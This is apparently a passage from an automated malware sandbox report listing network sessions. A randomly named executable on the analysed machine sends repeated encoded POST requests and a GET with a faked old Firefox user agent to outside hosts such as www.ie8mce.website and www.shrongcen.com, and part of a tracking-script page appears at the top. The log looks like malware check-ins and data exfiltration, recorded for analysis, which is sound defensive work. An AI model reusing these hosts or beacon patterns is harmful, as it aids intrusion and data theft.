window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
Jun 13, 2024 11:05:07.489033937 CEST	1236	IN	Data Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
Jun 13, 2024 11:05:07.489044905 CEST	1236	IN	Data Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()\|\|r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
Jun 13, 2024 11:05:07.489056110 CEST	400	IN	Data Raw: 72 28 76 61 72 20 71 73 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67 Data Ascii: r(var qsList=(window.location.search\|\|"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setA
Jun 13, 2024 11:05:07.491072893 CEST	1236	IN	Data Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
Jun 13, 2024 11:05:07.491082907 CEST	117	IN	Data Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 Data Ascii: <script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49732	176.113.70.180	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:12.873934031 CEST	715	OUT	POST /3osa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.ie8mce.website Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.ie8mce.website Referer: http://www.ie8mce.website/3osa/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 75 44 75 74 79 42 79 6a 79 6c 30 73 54 7a 41 58 75 2b 52 57 75 35 65 59 53 39 31 37 49 57 47 37 4c 48 41 43 34 54 45 78 63 72 6a 58 79 44 6e 34 77 4e 70 2b 72 79 76 55 43 78 42 73 54 47 35 64 70 6e 65 70 4f 6b 6b 49 33 62 4b 47 6e 77 78 38 4c 35 71 5a 4a 7a 4e 7a 4e 5a 50 2f 58 49 35 75 4d 62 32 6e 4f 66 2b 4e 30 37 75 57 76 70 66 62 45 37 56 36 51 56 47 52 45 44 64 4b 78 61 31 33 4a 73 79 50 4e 4b 6c 68 47 57 4a 64 7a 7a 41 75 67 30 52 46 4f 50 6e 52 33 2f 6d 33 59 50 42 41 59 54 64 6d 79 57 76 78 2b 73 75 64 6b 39 67 4a 31 55 7a 64 63 5a 36 32 6d 2b 38 3d Data Ascii: fD=Nzj1No0ZT/WKuDutyByjyl0sTzAXu+RWu5eYS917IWG7LHAC4TExcrjXyDn4wNp+ryvUCxBsTG5dpnepOkkI3bKGnwx8L5qZJzNzNZP/XI5uMb2nOf+N07uWvpfbE7V6QVGREDdKxa13JsyPNKlhGWJdzzAug0RFOPnR3/m3YPBAYTdmyWvx+sudk9gJ1UzdcZ62m+8=
Jun 13, 2024 11:05:13.990605116 CEST	570	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 13 Jun 2024 09:05:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED] Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si\|y`q.[>s`9MPv(F3]_e]!tm<grX/#\|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49733	176.113.70.180	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:15.414349079 CEST	735	OUT	POST /3osa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.ie8mce.website Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.ie8mce.website Referer: http://www.ie8mce.website/3osa/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 30 6a 65 74 77 67 79 6a 6c 56 30 76 4e 6a 41 58 6b 65 52 53 75 35 53 59 53 38 78 72 49 6c 69 37 4d 6c 49 43 37 58 6f 78 4d 37 6a 58 71 54 6e 39 2b 74 70 6c 72 79 71 70 43 30 35 73 54 43 70 64 70 6c 47 70 50 58 38 50 6c 62 4b 2b 2b 67 78 2b 46 5a 71 5a 4a 7a 4e 7a 4e 5a 61 59 58 4d 56 75 4e 6f 65 6e 50 2b 2b 43 2b 62 75 56 6c 4a 66 62 53 4c 55 7a 51 56 47 76 45 43 78 67 78 59 39 33 4a 75 36 50 4e 59 64 67 4e 57 4a 48 74 7a 42 41 77 6b 4d 79 42 73 6e 74 2b 39 50 59 4f 4e 5a 70 64 6c 77 4d 6f 30 6e 5a 74 4d 43 6c 30 75 6f 2b 6b 6b 53 30 47 36 71 47 34 70 70 48 74 47 33 2f 52 46 55 66 73 43 36 4a 32 48 4f 49 35 70 62 72 Data Ascii: fD=Nzj1No0ZT/WK0jetwgyjlV0vNjAXkeRSu5SYS8xrIli7MlIC7XoxM7jXqTn9+tplryqpC05sTCpdplGpPX8PlbK++gx+FZqZJzNzNZaYXMVuNoenP++C+buVlJfbSLUzQVGvECxgxY93Ju6PNYdgNWJHtzBAwkMyBsnt+9PYONZpdlwMo0nZtMCl0uo+kkS0G6qG4ppHtG3/RFUfsC6J2HOI5pbr
Jun 13, 2024 11:05:16.409250021 CEST	570	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 13 Jun 2024 09:05:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED] Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si\|y`q.[>s`9MPv(F3]_e]!tm<grX/#\|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49734	176.113.70.180	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:17.948419094 CEST	1752	OUT	POST /3osa/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.ie8mce.website Content-Length: 1239 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.ie8mce.website Referer: http://www.ie8mce.website/3osa/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 30 6a 65 74 77 67 79 6a 6c 56 30 76 4e 6a 41 58 6b 65 52 53 75 35 53 59 53 38 78 72 49 6c 71 37 4d 51 45 43 38 41 38 78 50 37 6a 58 30 44 6e 38 2b 74 6f 39 72 32 48 75 43 30 39 53 54 41 68 64 6f 45 6d 70 62 32 38 50 76 62 4b 2b 78 41 78 37 4c 35 72 54 4a 7a 64 33 4e 61 69 59 58 4d 56 75 4e 74 61 6e 4c 76 2b 43 78 37 75 57 76 70 65 4a 45 37 56 57 51 55 69 5a 45 43 30 56 78 73 4a 33 4a 4f 71 50 49 74 4a 67 41 57 4a 5a 6f 7a 42 75 77 6b 41 74 42 73 36 42 2b 39 58 68 4f 50 4a 70 65 54 52 6a 7a 77 37 76 76 63 69 62 6d 73 4d 65 2f 53 53 6f 4e 63 76 33 35 34 52 31 70 48 50 78 65 44 6b 46 34 77 2f 44 79 47 79 43 2b 4a 2b 4c 61 68 42 6c 61 2b 69 67 6d 38 32 51 79 38 65 63 75 48 6d 78 75 77 49 2b 2f 79 55 2b 64 67 58 4f 62 52 71 6a 6b 70 75 7a 43 6f 71 49 66 6d 57 75 66 51 63 45 54 32 34 45 6d 51 4c 4e 48 65 56 73 34 6d 51 63 58 74 49 37 74 65 6f 69 7a 64 71 57 78 5a 6a 6a 5a 41 7a 54 50 37 6b 4c 35 7a 49 37 78 65 35 46 71 6a 75 75 42 6f 34 50 48 33 39 44 57 71 45 [TRUNCATED] Data Ascii: fD=Nzj1No0ZT/WK0jetwgyjlV0vNjAXkeRSu5SYS8xrIlq7MQEC8A8xP7jX0Dn8+to9r2HuC09STAhdoEmpb28PvbK+xAx7L5rTJzd3NaiYXMVuNtanLv+Cx7uWvpeJE7VWQUiZEC0VxsJ3JOqPItJgAWJZozBuwkAtBs6B+9XhOPJpeTRjzw7vvcibmsMe/SSoNcv354R1pHPxeDkF4w/DyGyC+J+LahBla+igm82Qy8ecuHmxuwI+/yU+dgXObRqjkpuzCoqIfmWufQcET24EmQLNHeVs4mQcXtI7teoizdqWxZjjZAzTP7kL5zI7xe5FqjuuBo4PH39DWqE9mhXvmXAwo73RH8OXlQUX1ZCLkZvdAHwu8fhU6J7plYasOMp7oUrwX91esd9dbRe/CHOmWpdp8tQIYZ6vsRM0KkqN7WJ9MPqu10Psi80wmqdWnVkgnPst/A2enkgkPcZVwsrCEqFyImzZ2OEv2tzyUOcxbsr6dB1t9b3fyu8ByuD3Yg7+wmEoU97v6JdzILNLTFAhqWWYlAGjeAjH9KfmQu6yT9rB8mpmJLbOFekO6PKs7ShnMahAa2da9Ke5+/h0/0r9qeN/ix8r3dYHr/S3ClS7BkpUYlmk72THS5VHVDVnGJ8GcLwfNeBEF4KdLzThVxTXsuBUh7Nzqa9PPfMvF8nsIsrn0jSrAiq1HVePny/1bmsZ/RYfWnBoHYBRL5nyFPwheeJSbUUuRe1s8taTX2j75hVcGjtSOawrDgDJec+3FZqilBPKdwARJXQk7nTbsrxfh8rmf1f7uOKUvHJLxfnGZY5ffem9Dslqi/F0Sdzc3znB2HrZHoht6U+BXnQP3IqKCYteaauFWkAlRnYZJUIooSj0dj5ydVr+YwwQ4vqVeoIv8KgKfs9alUz0tlCECABU3dmrefGXgG8NxhBzF/24e29YrHpYIIxqFjNPyHzO/GLByvJJHueFrFyI/jVyfA5/GZpmhnJMeLmxBr5TZhHc69DnuRqbc [TRUNCATED]
Jun 13, 2024 11:05:18.950418949 CEST	570	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 13 Jun 2024 09:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED] Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si\|y`q.[>s`9MPv(F3]_e]!tm<grX/#\|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49735	176.113.70.180	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:20.481791019 CEST	453	OUT	GET /3osa/?fD=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==&j0=vTcl_2X8QJ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.ie8mce.website Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Jun 13, 2024 11:05:21.439558029 CEST	686	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 13 Jun 2024 09:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 65 64 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 2e 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 7a 69 6a 72 6d 66 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 22 20 2f 3e 20 20 20 20 0a 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 38 37 36 33 34 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a [TRUNCATED] Data Ascii: 1ed<html><head> <meta charset="utf-8"><meta http-equiv="refresh" content="0.1; url=https://zijrmf.com/register" /> <script type="text/javascript" src="https://js.users.51.la/21876343.js"></script><script>var _hmt = _hmt \|\| [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49736	123.58.214.101	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:26.956362009 CEST	712	OUT	POST /5965/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shrongcen.com Content-Length: 203 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.shrongcen.com Referer: http://www.shrongcen.com/5965/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 4e 30 58 66 74 6f 72 63 55 6f 49 36 6e 6e 76 77 72 70 47 70 4b 78 33 77 62 70 4c 59 35 4a 4b 53 62 50 67 51 4c 4f 66 70 43 44 75 31 38 62 33 7a 38 47 70 33 79 5a 68 44 68 67 62 77 5a 34 52 76 35 4a 76 6a 58 59 68 49 61 74 5a 50 56 6a 39 4f 35 74 34 70 45 62 62 4f 32 6d 48 56 4c 58 4a 70 5a 70 5a 4a 69 6e 6f 48 6b 69 57 69 42 41 31 32 45 49 6a 6e 58 73 36 38 76 35 59 38 6f 75 61 31 6c 74 64 4b 56 61 67 42 4c 56 69 30 31 30 44 47 55 6e 49 4b 6d 4d 45 39 32 59 51 6a 68 4e 48 30 7a 4e 47 33 6f 7a 70 61 6c 4e 53 48 55 77 38 5a 75 57 52 6f 30 54 42 41 4e 2f 6b 3d Data Ascii: fD=wh44AEn0JVqMN0XftorcUoI6nnvwrpGpKx3wbpLY5JKSbPgQLOfpCDu18b3z8Gp3yZhDhgbwZ4Rv5JvjXYhIatZPVj9O5t4pEbbO2mHVLXJpZpZJinoHkiWiBA12EIjnXs68v5Y8oua1ltdKVagBLVi010DGUnIKmME92YQjhNH0zNG3ozpalNSHUw8ZuWRo0TBAN/k=
Jun 13, 2024 11:05:27.937411070 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 13 Jun 2024 09:05:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49737	123.58.214.101	80	1352	C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe

Timestamp	Bytes transferred	Direction	Data
Jun 13, 2024 11:05:29.492664099 CEST	732	OUT	POST /5965/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shrongcen.com Content-Length: 223 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Origin: http://www.shrongcen.com Referer: http://www.shrongcen.com/5965/ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0 Data Raw: 66 44 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 50 56 6e 66 69 72 44 63 46 34 49 37 6f 48 76 77 39 5a 47 6c 4b 78 7a 77 62 6f 50 49 2b 37 65 53 63 72 6b 51 4b 50 66 70 42 44 75 31 6b 4c 32 33 34 47 70 47 79 5a 74 78 68 68 6e 77 5a 34 46 76 35 4e 6e 6a 58 76 31 48 62 39 5a 4e 42 54 39 4d 39 74 34 70 45 62 62 4f 32 6d 53 4f 4c 58 52 70 5a 36 42 4a 6a 44 38 45 71 43 57 68 57 77 31 32 41 49 6a 6a 58 73 37 62 76 34 45 47 6f 73 79 31 6c 73 74 4b 55 4c 67 43 53 46 69 32 6f 6b 43 54 51 48 74 47 2f 4d 55 42 31 72 4a 2b 30 76 58 75 37 62 72 64 79 52 68 79 32 74 2b 2f 45 6a 30 75 2f 6d 77 42 75 77 52 77 54 6f 7a 65 34 33 48 31 70 5a 7a 61 41 73 6f 69 56 76 4a 48 61 77 30 36 Data Ascii: fD=wh44AEn0JVqMPVnfirDcF4I7oHvw9ZGlKxzwboPI+7eScrkQKPfpBDu1kL234GpGyZtxhhnwZ4Fv5NnjXv1Hb9ZNBT9M9t4pEbbO2mSOLXRpZ6BJjD8EqCWhWw12AIjjXs7bv4EGosy1lstKULgCSFi2okCTQHtG/MUB1rJ+0vXu7brdyRhy2t+/Ej0u/mwBuwRwToze43H1pZzaAsoiVvJHaw06
Jun 13, 2024 11:05:30.467958927 CEST	318	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Thu, 13 Jun 2024 09:05:30 GMT Content-Type: text/html; charset=utf-8 Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
